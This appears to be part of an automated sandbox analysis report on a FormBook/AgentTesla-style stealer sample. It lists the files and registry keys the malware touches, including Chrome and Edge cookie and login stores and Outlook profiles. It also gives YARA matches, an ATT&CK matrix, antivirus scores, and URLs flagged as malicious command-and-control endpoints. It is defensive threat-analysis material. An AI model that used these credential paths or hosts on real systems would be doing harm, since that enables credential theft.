            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid AccountsWindows Management InstrumentationPath Interception412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		Exfiltration Over Bluetooth4
            Ingress Tool Transfer            		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration5
            Non-Application Layer Protocol            		Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureTraffic Duplication5
            Application Layer Protocol            		Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
            Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
            External Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            WrrCV4QR2J.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            WrrCV4QR2J.exe100%AviraTR/AD.Swotter.ladfk
            WrrCV4QR2J.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            https://mozilla.org0/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
            http://www.magmadokum.com/ahec/0%Avira URL Cloudsafe
            http://www.77moea.top/ahec/?XveXHZvx=W415zxONlMY0LROHEGAnVDwgVvy34PrUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7al4cCYp0GZGyu2aw==&l4xX=rDStpH0He100%Avira URL Cloudphishing
            http://www.nesmalt.info/ahec/?XveXHZvx=DTrGbTEHMG6Y4mK16jmiKUG3Xw8oKDF5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRrX+Dyau3GNz4OAA==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            http://www.instantconvey.com/ahec/?XveXHZvx=SEtDmKR01RO/v1ckzNpTcUhCl/PMZGqFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7YIFIq1ILz0nKZVg==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            http://www.fam-scharf.net/ahec/?XveXHZvx=pHT1kOem2IT0Y9TJ94VCHNnbNLZhsvH3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhQP0JKKbiUNKMEcA==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            http://www.fam-scharf.net/ahec/100%Avira URL Cloudmalware
            https://www.transip.eu/services/search-domains/0%Avira URL Cloudsafe
            http://www.poria.link/ahec/100%Avira URL Cloudmalware
            http://cdn.jsinit.directfwd.com/sk-jspark_init.php100%Avira URL Cloudmalware
            http://www.npstore.asia/ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL0rM/85NSIBYnKSu3X+covYz9Y5Yt4Y8akrMm9Q==&l4xX=rDStpH0He0%Avira URL Cloudsafe
            http://www.domainappraisalbot.com/ahec/100%Avira URL Cloudmalware
            http://www.altralogos.com/ahec/100%Avira URL Cloudmalware
            https://www.transip.eu/terms-of-service/0%Avira URL Cloudsafe
            http://www.611erhm.top/ahec/100%Avira URL Cloudphishing
            http://www.npstore.asia0%Avira URL Cloudsafe
            http://www.thecoloringbitch.com/ahec/?XveXHZvx=nB1qtJANgieev8TKH3dNfv3ofOkziUaCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMTKbCYScmVHGO9lg==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            http://www.user4deepriver.com/ahec/?XveXHZvx=9k2v98v8fW7x5mt2TD9N5hM0Gp49wMZ6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0pnZhULhTE/SFE2Bw==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
            http://www.domainappraisalbot.com/ahec/?XveXHZvx=bB5JTYLqXbmN0Rh52tJaPPP1nCuGRYxCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYc20p8FNjdU2pWhmA==&l4xX=rDStpH0He100%Avira URL Cloudmalware
            http://www.npstore.asia/ahec/0%Avira URL Cloudsafe
